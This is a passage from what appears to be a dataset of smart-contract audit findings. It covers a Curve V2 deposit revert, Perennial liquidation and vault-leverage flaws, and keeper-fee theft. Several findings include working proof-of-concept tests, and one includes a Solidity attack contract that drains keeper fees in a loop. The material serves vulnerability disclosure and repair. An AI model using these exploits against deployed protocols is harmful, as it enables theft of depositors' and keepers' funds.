msgValue > 0\\n );\\n } else {\\n lpTokens = ICurve2TokenPoolV1(CURVE_POOL).add_liquidity{value: msgValue}(\\n amounts, minPoolClaim\\n );\\n }\\n```\\n\\nIf the `use_eth` parameter is not defined, it will default to `False`. As a result, the Curve pool expects the caller to transfer over the WETH to the pool and the pool will call `WETH.withdraw` to unwrap the WETH to Native ETH as shown in the code below.\\nHowever, Notional's leverage vault only works with Native ETH, and if one of the pool tokens is WETH, it will explicitly convert the address to either the `Deployments.ALT_ETH_ADDRESS` (0xEeeee) or `Deployments.ETH_ADDRESS` (address(0)) during deployment and initialization.\\nThe implementation of the above `_joinPoolAndStake` function will forward Native ETH to the Curve Pool, while the pool expects the vault to transfer in WETH. As a result, a revert will occur since the pool did not receive the WETH it required during the unwrap process.\\n```\\ndef add_liquidity(\\n amounts: uint256[N_COINS],\\n min_mint_amount: uint256,\\n use_eth: bool = False,\\n receiver: address = msg.sender\\n) -> uint256:\\n """"""\\n @notice Adds liquidity into the pool.\\n @param amounts Amounts of each coin to add.\\n @param min_mint_amount Minimum amount of LP to mint.\\n @param use_eth True if native token is being added to the pool.\\n @param receiver Address to send the LP tokens to. Default is msg.sender\\n @return uint256 Amount of LP tokens received by the `receiver\\n """"""\\n..SNIP..\\n # --------------------- Get prices, balances -----------------------------\\n..SNIP..\\n # -------------------------------------- Update balances and calculate xp.\\n..SNIP// rest of code\\n # ---------------- transferFrom token into the pool ----------------------\\n\\n for i in range(N_COINS):\\n\\n if amounts[i] > 0:\\n\\n if coins[i] == WETH20:\\n\\n self._transfer_in(\\n coins[i],\\n amounts[i],\\n 0, # <-----------------------------------\\n msg.value, # | No callbacks\\n empty(address), # <----------------------| for\\n empty(bytes32), # <----------------------| add_liquidity.\\n msg.sender, # |\\n empty(address), # <-----------------------\\n use_eth\\n )\\n```\\n\\n```\\ndef _transfer_in(\\n..SNIP..\\n use_eth: bool\\n):\\n..SNIP..\\n @params use_eth True if the transfer is ETH, False otherwise.\\n """"""\\n\\n if use_eth and _coin == WETH20:\\n assert mvalue == dx # dev: incorrect eth amount\\n else:\\n..SNIP..\\n if _coin == WETH20:\\n WETH(WETH20).withdraw(dx) # <--------- if WETH was transferred in\\n # previous step and `not use_eth`, withdraw WETH to ETH.\\n```\\n","Ensure the `IS_CURVE_V2` variable is initialized on the Arbitrum and Optimism side chains according to the Curve Pool's version.\\nIf there is a limitation on the existing approach to determining a pool is V1 or V2 on Arbitrum and Optimsim, an alternative approach might be to use the presence of a `gamma()` function as an indicator of pool type","No users will be able to deposit to the Leverage Vault on Arbitrum and Optimism that supports Curve V2 pools. The deposit function is a core function of any vault. Thus, this issue breaks the core contract functionality of a vault.\\nIn addition, if the affected vaults cannot be used, it leads to a loss of revenue for the protocol.","```\\nFile: Curve2TokenPoolMixin.sol\\n constructor(\\n NotionalProxy notional_,\\n DeploymentParams memory params\\n ) SingleSidedLPVaultBase(notional_, params.tradingModule) {\\n CURVE_POOL = params.pool;\\n\\n bool isCurveV2 = false;\\n if (Deployments.CHAIN_ID == Constants.CHAIN_ID_MAINNET) {\\n address[10] memory handlers = \\n Deployments.CURVE_META_REGISTRY.get_registry_handlers_from_pool(address(CURVE_POOL));\\n\\n require(\\n handlers[0] == Deployments.CURVE_V1_HANDLER ||\\n handlers[0] == Deployments.CURVE_V2_HANDLER\\n ); // @dev unknown Curve version\\n isCurveV2 = (handlers[0] == Deployments.CURVE_V2_HANDLER);\\n }\\n IS_CURVE_V2 = isCurveV2;\\n```\\n" +"Liquidator can liquidate user while increasing user position to any value, stealing all Market funds or bricking the contract",high,"When a user is liquidated, there is a check to ensure that after liquidator order executes, `closable = 0`, but this actually doesn't prevent liquidator from increasing user position, and since all position size and collateral checks are skipped during liquidation, this allows malicious liquidator to open position of max possible size (2^62-1) during liquidation. Opening such huge position means the Market contract accounting is basically broken from this point without any ability to restore it. For example, the fee paid (and accumulated by makers) from opening such position will be higher than entire Market collateral balance, so any maker can withdraw full Market balance immediately after this position is settled.\\n`closable` is the value calculated as the maximum possible position size that can be closed even if some pending position updates are invalidated due to invalid oracle version. For example:\\nLatest position = 10\\nPending position [t=200] = 0\\nPending position [t=300] = 1000\\nIn such scenario `closable = 0` (regardless of position size at t=300).\\nWhen position is liquidated (called `protected` in the code), the following requirements are enforced in _invariant():\\n```\\nif (protected && (\\n !context.closable.isZero() || // @audit even if closable is 0, position can still increase\\n context.latestPosition.local.maintained(\\n context.latestVersion,\\n context.riskParameter,\\n context.pendingCollateral.sub(collateral)\\n ) ||\\n collateral.lt(Fixed6Lib.from(-1, _liquidationFee(context, newOrder)))\\n)) revert MarketInvalidProtectionError();\\n\\nif (\\n !(context.currentPosition.local.magnitude().isZero() && context.latestPosition.local.magnitude().isZero()) && // sender has no position\\n !(newOrder.isEmpty() && collateral.gte(Fixed6Lib.ZERO)) && // sender is depositing zero or more into account, without position change\\n (context.currentTimestamp - context.latestVersion.timestamp >= context.riskParameter.staleAfter) // price is not stale\\n) revert MarketStalePriceError();\\n\\nif (context.marketParameter.closed && newOrder.increasesPosition())\\n revert MarketClosedError();\\n\\nif (context.currentPosition.global.maker.gt(context.riskParameter.makerLimit))\\n revert MarketMakerOverLimitError();\\n\\nif (!newOrder.singleSided(context.currentPosition.local) || !newOrder.singleSided(context.latestPosition.local))\\n revert MarketNotSingleSidedError();\\n\\nif (protected) return; // The following invariants do not apply to protected position updates (liquidations)\\n```\\n\\nThe requirements for liquidated positions are:\\nclosable = 0, user position collateral is below maintenance, liquidator withdraws no more than liquidation fee\\nmarket oracle price is not stale\\nfor closed market - order doesn't increase position\\nmaker position doesn't exceed maker limit\\norder and position are single-sided\\nAll the other invariants are skipped for liquidation, including checks for long or short position size and collateral.\\nAs shown in the example above, it's possible for the user to have `closable = 0` while having the new (current) position size of any amount, which makes it possible to succesfully liquidate user while increasing the position size (long or short) to any amount (up to max `2^62-1` enforced when storing position size values).\\nScenario for opening any position size (oracle granularity = 100): T=1: ETH price = $100. User opens position `long = 10` with collateral = min margin ($350) T=120: Oracle version T=100 is commited, price = $100, user position is settled (becomes latest) ... T=150: ETH price starts moving against the user, so the user tries to close the position calling `update(0,0,0,0,false)` T=205: Current price is $92 and user becomes liquidatable (before the T=200 price is commited, so his close request is still pending). Liquidator commits unrequested oracle version T=190, price = $92, user is liquidated while increasing his position: `update(0,2^62-1,0,0,true)` Liquidation succeeds, because user has latest `long = 10`, pending long = 0 (t=200), liquidation pending long = 2^62-1 (t=300). `closable = 0`.\\nThe scenario above is demonstrated in the test, add this to test/unit/market/Market.test.ts:\\n```\\nit('liquidate with huge open position', async () => {\\nconst positionMaker = parse6decimal('20.000')\\nconst positionLong = parse6decimal('10.000')\\nconst collateral = parse6decimal('1000')\\nconst collateral2 = parse6decimal('350')\\nconst maxPosition = parse6decimal('4611686018427') // 2^62-1\\n\\nconst oracleVersion = {\\n price: parse6decimal('100'),\\n timestamp: TIMESTAMP,\\n valid: true,\\n}\\noracle.at.whenCalledWith(oracleVersion.timestamp).returns(oracleVersion)\\noracle.status.returns([oracleVersion, TIMESTAMP + 100])\\noracle.request.returns()\\n\\n// maker\\ndsu.transferFrom.whenCalledWith(userB.address, market.address, collateral.mul(1e12)).returns(true)\\nawait market.connect(userB).update(userB.address, positionMaker, 0, 0, collateral, false)\\n\\n// user opens long=10\\ndsu.transferFrom.whenCalledWith(user.address, market.address, collateral2.mul(1e12)).returns(true)\\nawait market.connect(user).update(user.address, 0, positionLong, 0, collateral2, false)\\n\\nconst oracleVersion2 = {\\n price: parse6decimal('100'),\\n timestamp: TIMESTAMP + 100,\\n valid: true,\\n}\\noracle.at.whenCalledWith(oracleVersion2.timestamp).returns(oracleVersion2)\\noracle.status.returns([oracleVersion2, TIMESTAMP + 200])\\noracle.request.returns()\\n\\n// price moves against user, so he's at the edge of liquidation and tries to close\\n// position: latest=10, pending [t=200] = 0 (closable = 0)\\nawait market.connect(user).update(user.address, 0, 0, 0, 0, false)\\n\\nconst oracleVersion3 = {\\n price: parse6decimal('92'),\\n timestamp: TIMESTAMP + 190,\\n valid: true,\\n}\\noracle.at.whenCalledWith(oracleVersion3.timestamp).returns(oracleVersion3)\\noracle.status.returns([oracleVersion3, TIMESTAMP + 300])\\noracle.request.returns()\\n\\nvar loc = await market.locals(user.address);\\nvar posLatest = await market.positions(user.address);\\nvar posCurrent = await market.pendingPositions(user.address, loc.currentId);\\nconsole.log(""Before liquidation. Latest= "" + posLatest.long + "" current = "" + posCurrent.long);\\n\\n// t = 205: price drops to 92, user becomes liquidatable before the pending position oracle version is commited\\n// liquidator commits unrequested price = 92 at oracle version=190, but current timestamp is already t=300\\n// liquidate. User pending positions:\\n// latest = 10\\n// pending [t=200] = 0\\n// current(liquidated) [t=300] = max possible position (2^62-1)\\nawait market.connect(user).update(user.address, 0, maxPosition, 0, 0, true)\\n\\nvar loc = await market.locals(user.address);\\nvar posLatest = await market.positions(user.address);\\nvar posCurrent = await market.pendingPositions(user.address, loc.currentId);\\nconsole.log(""After liquidation. Latest= "" + posLatest.long + "" current = "" + posCurrent.long);\\n\\n})\\n```\\n","When liquidating, order must decrease position:\\n```\\nif (protected && (\\n !context.closable.isZero() || // @audit even if closable is 0, position can still increase\\n context.latestPosition.local.maintained(\\n context.latestVersion,\\n context.riskParameter,\\n context.pendingCollateral.sub(collateral)\\n ) ||\\n- collateral.lt(Fixed6Lib.from(-1, _liquidationFee(context, newOrder)))\\n+ collateral.lt(Fixed6Lib.from(-1, _liquidationFee(context, newOrder))) ||\\n+ newOrder.maker.add(newOrder.long).add(newOrder.short).gte(Fixed6Lib.ZERO)\\n)) revert MarketInvalidProtectionError();\\n```\\n","Malicious liquidator can liquidate users while increasing their position to any value including max possible 2^62-1 ignoring any collateral and position size checks. This is possible on its own, but liquidator can also craft such situation with very high probability. As a result of this action, all users will lose all their funds deposited into Market. For example, fee paid (and accured by makers) from max possible position will exceed total Market collateral balance so that the first maker will be able to withdraw all Market balance, minimal price change will create huge profit for the user, exceeding Market balance (if fee = 0) etc.","```\\nif (protected && (\\n !context.closable.isZero() || // @audit even if closable is 0, position can still increase\\n context.latestPosition.local.maintained(\\n context.latestVersion,\\n context.riskParameter,\\n context.pendingCollateral.sub(collateral)\\n ) ||\\n collateral.lt(Fixed6Lib.from(-1, _liquidationFee(context, newOrder)))\\n)) revert MarketInvalidProtectionError();\\n\\nif (\\n !(context.currentPosition.local.magnitude().isZero() && context.latestPosition.local.magnitude().isZero()) && // sender has no position\\n !(newOrder.isEmpty() && collateral.gte(Fixed6Lib.ZERO)) && // sender is depositing zero or more into account, without position change\\n (context.currentTimestamp - context.latestVersion.timestamp >= context.riskParameter.staleAfter) // price is not stale\\n) revert MarketStalePriceError();\\n\\nif (context.marketParameter.closed && newOrder.increasesPosition())\\n revert MarketClosedError();\\n\\nif (context.currentPosition.global.maker.gt(context.riskParameter.makerLimit))\\n revert MarketMakerOverLimitError();\\n\\nif (!newOrder.singleSided(context.currentPosition.local) || !newOrder.singleSided(context.latestPosition.local))\\n revert MarketNotSingleSidedError();\\n\\nif (protected) return; // The following invariants do not apply to protected position updates (liquidations)\\n```\\n" +Vault leverage can be increased to any value up to min margin requirement due to incorrect `maxRedeem` calculations with closable and `LEVERAGE_BUFFER`,high,"When redeeming from the vault, maximum amount allowed to be redeemed is limited by collateral required to keep the minimum vault position size which will remain open due to different factors, including `closable` value, which is a limitation on how much position can be closed given current pending positions. However, when calclulating max redeemable amount, `closable` value is multiplied by `LEVERAGE_BUFFER` value (currently 1.2):\\n```\\nUFixed6 collateral = marketContext.currentPosition.maker\\n .sub(marketContext.currentPosition.net().min(marketContext.currentPosition.maker)) // available maker\\n .min(marketContext.closable.mul(StrategyLib.LEVERAGE_BUFFER)) // available closable\\n .muldiv(marketContext.latestPrice.abs(), registration.leverage) // available collateral\\n .muldiv(totalWeight, registration.weight); // collateral in market\\n```\\n\\nThe intention seems to be to allow to withdraw a bit more collateral so that leverage can increase at max by LEVERAGE_BUFFER. However, the math is totally wrong here, for example:\\nCurrent position = 12, `closable = 10`\\nMax amount allowed to be redeemed is 12 (100% of shares)\\nHowever, when all shares are withdrawn, `closable = 10` prevents full position closure, so position will remain at 12-10 = 2\\nOnce settled, user can claim all vault collateral while vault still has position of size 2 open. Claiming all collateral will revert due to this line in allocate:\\n```\\n_locals.marketCollateral = strategy.marketContexts[marketId].margin\\n .add(collateral.sub(_locals.totalMargin).muldiv(registrations[marketId].weight, _locals.totalWeight));\\n```\\n\\nSo the user can claim the assets only if remaining collateral is equal to or is greater than total margin of all markets. This means that user can put the vault into max leverage possible ignoring the vault leverage config (vault will have open position of such size, which will make all vault collateral equal the minimum margin requirement to open such position). This creates a big risk for vault liquidation and loss of funds for vault depositors.\\nAs seen from the example above, it's possible to put the vault at high leverage only if user redeems amount higher than `closable` allows (redeem amount in the closable..closable * LEVERAGE_BUFFER range). However, since deposits and redeems from the vault are settled later, it's impossible to directly create such situation (redeemable amount > closable). There is still a way to create such situation indirectly via maker limit limitation.\\nScenario:\\nMarket config leverage = 4. Existing deposits = $1K. Existing positions in underlying market are worth $4K\\nOpen maker position in underlying markets such that `makerLimit - currentMaker = $36K`\\nDeposit $11K to the vault (total deposits = $12K). The vault will try to open position of size = $48K (+$44K), however `makerLimit` will not allow to open full position, so the vault will only open +$36K (total position $40K)\\nWait until the deposit settles\\nClose maker position in underlying markets to free up maker limit\\nDeposit minimum amount to the vault from another user. This increases vault positions to $48K (settled = $40K, pending = $48K, `closable` = $40K)\\nRedeem $11K from the vault. This is possible, because maxRedeem is `closable/leverage*LEVERAGE_BUFFER` = `$40K/4*1.2` = `$12K`. However, the position will be limited by `closable`, so it will be reduced only by $40K (set to $8K).\\nWait until redeem settles\\nClaim $11K from the vault. This leaves the vault with the latest position = $8K, but only with $1K of original deposit, meaning vault leverage is now 8 - twice the value specified by config (4).\\nThis scenario will keep high vault leverage only for a short time until next oracle version, because `claim` will reduce position back to $4K, however this position reduction can also be avoided, for example, by opening/closing positions to make `long-short = maker` or `short-long = maker` in the underlying market(s), thus disallowing the vault to reduce its maker position and keeping the high leverage.\\nThe scenario above is demonstrated in the test, add this to Vault.test.ts:\\n```\\nit('increase vault leverage', async () => {\\n console.log(""start"");\\n\\n async function setOracle(latestTime: BigNumber, currentTime: BigNumber) {\\n await setOracleEth(latestTime, currentTime)\\n await setOracleBtc(latestTime, currentTime)\\n }\\n\\n async function setOracleEth(latestTime: BigNumber, currentTime: BigNumber) {\\n const [, currentPrice] = await oracle.latest()\\n const newVersion = {\\n timestamp: latestTime,\\n price: currentPrice,\\n valid: true,\\n }\\n oracle.status.returns([newVersion, currentTime])\\n oracle.request.whenCalledWith(user.address).returns()\\n oracle.latest.returns(newVersion)\\n oracle.current.returns(currentTime)\\n oracle.at.whenCalledWith(newVersion.timestamp).returns(newVersion)\\n }\\n\\n async function setOracleBtc(latestTime: BigNumber, currentTime: BigNumber) {\\n const [, currentPrice] = await btcOracle.latest()\\n const newVersion = {\\n timestamp: latestTime,\\n price: currentPrice,\\n valid: true,\\n }\\n btcOracle.status.returns([newVersion, currentTime])\\n btcOracle.request.whenCalledWith(user.address).returns()\\n btcOracle.latest.returns(newVersion)\\n btcOracle.current.returns(currentTime)\\n btcOracle.at.whenCalledWith(newVersion.timestamp).returns(newVersion)\\n }\\n\\n async function logLeverage() {\\n // vault collateral\\n var vaultCollateralEth = (await market.locals(vault.address)).collateral\\n var vaultCollateralBtc = (await btcMarket.locals(vault.address)).collateral\\n var vaultCollateral = vaultCollateralEth.add(vaultCollateralBtc)\\n\\n // vault position\\n var vaultPosEth = (await market.positions(vault.address)).maker;\\n var ethPrice = (await oracle.latest()).price;\\n var vaultPosEthUsd = vaultPosEth.mul(ethPrice);\\n var vaultPosBtc = (await btcMarket.positions(vault.address)).maker;\\n var btcPrice = (await btcOracle.latest()).price;\\n var vaultPosBtcUsd = vaultPosBtc.mul(btcPrice);\\n var vaultPos = vaultPosEthUsd.add(vaultPosBtcUsd);\\n var leverage = vaultPos.div(vaultCollateral);\\n console.log(""Vault collateral = "" + vaultCollateral.div(1e6) + "" pos = "" + vaultPos.div(1e12) + "" leverage = "" + leverage);\\n }\\n\\n await setOracle(STARTING_TIMESTAMP.add(3600), STARTING_TIMESTAMP.add(3700))\\n await vault.settle(user.address);\\n\\n // put markets at the (limit - 5000) each\\n var makerLimit = (await market.riskParameter()).makerLimit;\\n var makerCurrent = (await market.position()).maker;\\n var maker = makerLimit;\\n var ethPrice = (await oracle.latest()).price;\\n var availUsd = parse6decimal('32000'); // 10/2 * 4\\n var availToken = availUsd.mul(1e6).div(ethPrice);\\n maker = maker.sub(availToken);\\n var makerBefore = makerCurrent;// (await market.positions(user.address)).maker;\\n console.log(""ETH Limit = "" + makerLimit + "" CurrentGlobal = "" + makerCurrent + "" CurrentUser = "" + makerBefore + "" price = "" + ethPrice + "" availToken = "" + availToken + "" maker = "" + maker);\\n for (var i = 0; i < 5; i++)\\n await fundWallet(asset, user);\\n await market.connect(user).update(user.address, maker, 0, 0, parse6decimal('1000000'), false)\\n\\n var makerLimit = (await btcMarket.riskParameter()).makerLimit;\\n var makerCurrent = (await btcMarket.position()).maker;\\n var maker = makerLimit;\\n var btcPrice = (await btcOracle.latest()).price;\\n var availUsd = parse6decimal('8000'); // 10/2 * 4\\n var availToken = availUsd.mul(1e6).div(btcPrice);\\n maker = maker.sub(availToken);\\n var makerBeforeBtc = makerCurrent;// (await market.positions(user.address)).maker;\\n console.log(""BTC Limit = "" + makerLimit + "" CurrentGlobal = "" + makerCurrent + "" CurrentUser = "" + makerBeforeBtc + "" price = "" + btcPrice + "" availToken = "" + availToken + "" maker = "" + maker);\\n for (var i = 0; i < 10; i++)\\n await fundWallet(asset, btcUser1);\\n await btcMarket.connect(btcUser1).update(btcUser1.address, maker, 0, 0, parse6decimal('2000000'), false)\\n\\n console.log(""market updated"");\\n\\n var deposit = parse6decimal('12000')\\n await vault.connect(user).update(user.address, deposit, 0, 0)\\n\\n await setOracle(STARTING_TIMESTAMP.add(3700), STARTING_TIMESTAMP.add(3800))\\n await vault.settle(user.address)\\n\\n await logLeverage();\\n\\n // withdraw the blocking amount\\n console.log(""reduce maker blocking position to allow vault maker increase"")\\n await market.connect(user).update(user.address, makerBefore, 0, 0, 0, false);\\n await btcMarket.connect(btcUser1).update(btcUser1.address, makerBeforeBtc, 0, 0, 0, false);\\n\\n await setOracle(STARTING_TIMESTAMP.add(3800), STARTING_TIMESTAMP.add(3900))\\n\\n // refresh vault to increase position size since it's not held now\\n var deposit = parse6decimal('10')\\n console.log(""Deposit small amount to increase position"")\\n await vault.connect(user2).update(user2.address, deposit, 0, 0)\\n\\n // now redeem 11000 (which is allowed, but market position will be 2000 due to closable)\\n var redeem = parse6decimal('11500')\\n console.log(""Redeeming 11500"")\\n await vault.connect(user).update(user.address, 0, redeem, 0);\\n\\n // settle all changes\\n await setOracle(STARTING_TIMESTAMP.add(3900), STARTING_TIMESTAMP.add(4000))\\n await vault.settle(user.address)\\n await logLeverage();\\n\\n // claim those assets we've withdrawn\\n var claim = parse6decimal('11100')\\n console.log(""Claiming 11100"")\\n await vault.connect(user).update(user.address, 0, 0, claim);\\n\\n await logLeverage();\\n})\\n```\\n\\nConsole log from execution of the code above:\\n```\\nstart\\nETH Limit = 1000000000 CurrentGlobal = 200000000 CurrentUser = 200000000 price = 2620237388 availToken = 12212633 maker = 987787367\\nBTC Limit = 100000000 CurrentGlobal = 20000000 CurrentUser = 20000000 price = 38838362695 availToken = 205981 maker = 99794019\\nmarket updated\\nVault collateral = 12000 pos = 39999 leverage = 3333330\\nreduce maker blocking position to allow vault maker increase\\nDeposit small amount to increase position\\nRedeeming 11500\\nVault collateral = 12010 pos = 8040 leverage = 669444\\nClaiming 11100\\nVault collateral = 910 pos = 8040 leverage = 8835153\\n```\\n","The formula to allow LEVERAGE_BUFFER should apply it to final position size, not to delta position size (maxRedeem returns delta to subtract from current position). Currently redeem amount it limited by: `closable * LEVERAGE_BUFFER`. Once subtracted from the current position size, we obtain:\\n`maxRedeem = closable * LEVERAGE_BUFFER / leverage`\\n`newPosition = currentPosition - closable`\\n`newCollateral = (currentPosition - closable * LEVERAGE_BUFFER) / leverage`\\n`newLeverage = newPosition / newCollateral = leverage * (currentPosition - closable) / (currentPosition - closable * LEVERAGE_BUFFER)`\\n`= leverage / (1 - (LEVERAGE_BUFFER - 1) * closable / (currentPosition - closable))`\\nAs can be seen, the new leverage can be any amount and the formula doesn't make much sense, it certainly doesn't limit new leverage factor to LEVERAGE_BUFFER (denominator can be 0, negative or any small value, meaning leverage can be any number as high as you want). I think what developers wanted, is to have:\\n`newPosition = currentPosition - closable`\\n`newCollateral = newPosition / (leverage * LEVERAGE_BUFFER)`\\n`newLeverage = newPosition / (newPosition / (leverage * LEVERAGE_BUFFER)) = leverage * LEVERAGE_BUFFER`\\nNow, the important part to understand is that it's impossible to calculate delta collateral simply from delta position like it is now. When we know target newPosition, we can calculate target newCollateral, and then maxRedeem (delta collateral) can be calculated as currentCollateral - newCollateral:\\n`maxRedeem = currentCollateral - newCollateral`\\n`maxRedeem = currentCollateral - newPosition / (leverage * LEVERAGE_BUFFER)`\\nSo the fixed collateral calculation can be something like that:\\n```\\nUFixed6 deltaPosition = marketContext.currentPosition.maker\\n .sub(marketContext.currentPosition.net().min(marketContext.currentPosition.maker)) // available maker\\n .min(marketContext.closable);\\nUFixed6 targetPosition = marketContext.currentAccountPosition.maker.sub(deltaPosition); // expected ideal position\\nUFixed6 targetCollateral = targetPosition.muldiv(marketContext.latestPrice.abs(), \\n registration.leverage.mul(StrategyLib.LEVERAGE_BUFFER)); // allow leverage to be higher by LEVERAGE_BUFFER\\nUFixed6 collateral = marketContext.local.collateral.sub(targetCollateral) // delta collateral\\n .muldiv(totalWeight, registration.weight); // market collateral => vault collateral\\n```\\n","Malicious user can put the vault at very high leverage, breaking important protocol invariant (leverage not exceeding target market leverage) and exposing the users to much higher potential funds loss / risk from the price movement due to high leverage and very high risk of vault liquidation, causing additional loss of funds from liquidation penalties and position re-opening fees.","```\\nUFixed6 collateral = marketContext.currentPosition.maker\\n .sub(marketContext.currentPosition.net().min(marketContext.currentPosition.maker)) // available maker\\n .min(marketContext.closable.mul(StrategyLib.LEVERAGE_BUFFER)) // available closable\\n .muldiv(marketContext.latestPrice.abs(), registration.leverage) // available collateral\\n .muldiv(totalWeight, registration.weight); // collateral in market\\n```\\n" +Vault max redeem calculations limit redeem amount to the smallest position size in underlying markets which can lead to very small max redeem amount even with huge TVL vault,high,"When redeeming from the vault, maximum amount allowed to be redeemed is limited by current opened position in each underlying market (the smallest opened position adjusted for weight). However, if any one market has its maker close to maker limit, the vault will open very small position, limited by maker limit. But now all redeems will be limited by this very small position for no reason: when almost any amount is redeemed, the vault will attempt to increase (not decrease) position in such market, so there is no sense in limiting redeem amount to the smallest position.\\nThis issue can create huge problems for users with large deposits. For example, if the user has deposited $10M to the vault, but due to one of the underlying markets the max redeem amount is only $1, user will need to do 10M transactions to redeem his full amount (which will not make sense due to gas).\\nVault's `maxRedeem` is calculated for each market as:\\n```\\nUFixed6 collateral = marketContext.currentPosition.maker\\n .sub(marketContext.currentPosition.net().min(marketContext.currentPosition.maker)) // available maker\\n .min(marketContext.closable.mul(StrategyLib.LEVERAGE_BUFFER)) // available closable\\n .muldiv(marketContext.latestPrice.abs(), registration.leverage) // available collateral\\n .muldiv(totalWeight, registration.weight); // collateral in market\\n\\nredemptionAssets = redemptionAssets.min(collateral);\\n```\\n\\n`closable` is limited by the vault's settled and current positions in the market. As can be seen from the calculation, redeem amount is limited by vault's position in the market. However, if the position is far from target due to different market limitations, this doesn't make much sense. For example, if vault has $2M deposts and there are 2 underlying markets, each with weight 1, and:\\nIn Market1 vault position is worth $1 (target position = $1M)\\nIn Market2 vault position is worth $1M (target position = $1M)\\nThe `maxRedeem` will be limited to $1, even though redeeming any amount up to $999999 will only make the vault attempt to increase position in Market1 rather than decrease.\\nThere is also an opposite situation possible, when current position is higher than target position (due to LEVERAGE_BUFFER). This will make maxredeem too high. For example, similar example to previous, but:\\nIn Market1 vault position is worth $1.2M (target position = $1M)\\nIn Market2 vault position is worth $1.2M (target position = $1M)\\nThe `maxRedeem` will be limited to $1.44M (due to LEVERAGE_BUFFER), without even comparing the current collateral (which is just $1M per market), based only on position size.","Consider calculating max redeem by comparing target position vs current position and then target collateral vs current collateral instead of using only current position for calculations. This might be somewhat complex, because it will require to re-calculate allocation amounts to compare target vs current position. Possibly max redeem should not be limited as a separate check, but rather as part of the `allocate()` calculations (reverting if the actual leverage is too high in the end)","When vault's position is small in any underlying market due to maker limit, the max redeem amount in the vault will be very small, which will force users with large deposits to use a lot of transactions to redeem it (they'll lose funds to gas) or it might even be next to impossible to do at all (if, for example, user has a deposit of $10M and max redeem = $1), in such case the redeems are basically broken and not possible to do.","```\\nUFixed6 collateral = marketContext.currentPosition.maker\\n .sub(marketContext.currentPosition.net().min(marketContext.currentPosition.maker)) // available maker\\n .min(marketContext.closable.mul(StrategyLib.LEVERAGE_BUFFER)) // available closable\\n .muldiv(marketContext.latestPrice.abs(), registration.leverage) // available collateral\\n .muldiv(totalWeight, registration.weight); // collateral in market\\n\\nredemptionAssets = redemptionAssets.min(collateral);\\n```\\n" +Attacker can call `KeeperFactory#settle` with empty arrays as input parameters to steal all keeper fees,high,"Anyone can call `KeeperFactory#request`, inputting empty arrays as parameters, and the call will succeed, and the caller receives a fee.\\nAttacker can perform this attack many times within a loop to steal ALL keeper fees from protocol.\\nExpected Workflow:\\nUser calls `Market#update` to open a new position\\nMarket calls `Oracle#request` to request a new oracleVersion\\nThe User's account gets added to a callback array of the market\\nOnce new oracleVersion gets committed, keepers can call `KeeperFactory#settle`, which will call `Market#update` on accounts in the Market's callback array, and pay the keeper(i.e. caller) a fee.\\n`KeeperFactory#settle` call will fail if there is no account to settle(i.e. if callback array is empty)\\nAfter settleing an account, it gets removed from the callback array\\nThe issue:\\nHere is KeeperFactory#settle function:\\n```\\nfunction settle(bytes32[] memory ids, IMarket[] memory markets, uint256[] memory versions, uint256[] memory maxCounts)\\n external\\n keep(settleKeepConfig(), msg.data, 0, """")\\n{\\n if (\\n ids.length != markets.length ||\\n ids.length != versions.length ||\\n ids.length != maxCounts.length ||\\n // Prevent calldata stuffing\\n abi.encodeCall(KeeperFactory.settle, (ids, markets, versions, maxCounts)).length != msg.data.length\\n )\\n revert KeeperFactoryInvalidSettleError();\\n\\n for (uint256 i; i < ids.length; i++)\\n IKeeperOracle(address(oracles[ids[i]])).settle(markets[i], versions[i], maxCounts[i]);\\n}\\n```\\n\\nAs we can see, function does not check if the length of the array is 0, so if user inputs empty array, the for loop will not be entered, but the keeper still receives a fee via the `keep` modifier.\\nAttacker can have a contract perform the attack multiple times in a loop to drain all fees:\\n```\\ninterface IKeeperFactory{\\n function settle(bytes32[] memory ids,IMarket[] memory markets,uint256[] memory versions,uint256[] memory maxCounts\\n ) external;\\n}\\n\\ninterface IMarket(\\n function update()external;\\n)\\n\\ncontract AttackContract{\\n\\n address public attacker;\\n address public keeperFactory;\\n IERC20 public keeperToken;\\n\\n constructor(address perennialDeployedKeeperFactory, IERC20 _keeperToken){\\n attacker=msg.sender;\\n keeperFactory=perennialDeployedKeeperFactory;\\n keeperToken=_keeperToken;\\n }\\n\\n function attack()external{\\n require(msg.sender==attacker,""not allowed"");\\n\\n bool canSteal=true;\\n\\n // empty arrays as parameters\\n bytes32[] memory ids=[];\\n IMarket[] memory markets=[];\\n uint256[] versions=[];\\n uint256[] maxCounts=[];\\n\\n // perform attack in a loop till all funds are drained or call reverts\\n while(canSteal){\\n try IKeeperFactory(keeperFactory).settle(ids,markets,versions,maxCounts){\\n //\\n }catch{\\n canSteal=false;\\n }\\n }\\n keeperToken.transfer(msg.sender, keeperToken.balanceOf(address(this)));\\n }\\n}\\n```\\n","Within KeeperFactory#settle function, revert if ids.length==0:\\n```\\nfunction settle(\\n bytes32[] memory ids,\\n IMarket[] memory markets,\\n uint256[] memory versions,\\n uint256[] memory maxCounts\\n)external keep(settleKeepConfig(), msg.data, 0, """") {\\n if (\\n++++ ids.length==0 ||\\n ids.length != markets.length ||\\n ids.length != versions.length ||\\n ids.length != maxCounts.length ||\\n // Prevent calldata stuffing\\n abi.encodeCall(KeeperFactory.settle, (ids, markets, versions, maxCounts)).length != msg.data.length\\n ) revert KeeperFactoryInvalidSettleError();\\n\\n for (uint256 i; i < ids.length; i++)\\n IKeeperOracle(address(oracles[ids[i]])).settle(markets[i], versions[i], maxCounts[i]);\\n}\\n```\\n","All keeper fees can be stolen from protocol, and there will be no way to incentivize Keepers to commitRequested oracle version, and other keeper tasks","```\\nfunction settle(bytes32[] memory ids, IMarket[] memory markets, uint256[] memory versions, uint256[] memory maxCounts)\\n external\\n keep(settleKeepConfig(), msg.data, 0, """")\\n{\\n if (\\n ids.length != markets.length ||\\n ids.length != versions.length ||\\n ids.length != maxCounts.length ||\\n // Prevent calldata stuffing\\n abi.encodeCall(KeeperFactory.settle, (ids, markets, versions, maxCounts)).length != msg.data.length\\n )\\n revert KeeperFactoryInvalidSettleError();\\n\\n for (uint256 i; i < ids.length; i++)\\n IKeeperOracle(address(oracles[ids[i]])).settle(markets[i], versions[i], maxCounts[i]);\\n}\\n```\\n" +MultiInvoker doesn't pay keepers refund for l1 calldata,medium,"MultiInvoker doesn't pay keepers refund for l1 calldata, as result keepers can be not incentivized to execute orders.\\nMultiInvoker contract allows users to create orders, which then can be executed by keepers. For his job, keeper receives fee from order's creator. This fee payment is handled by `_handleKeep` function.\\nThe function will call `keep` modifier and will craft `KeepConfig` which contains `keepBufferCalldata`, which is flat fee for l1 calldata of this 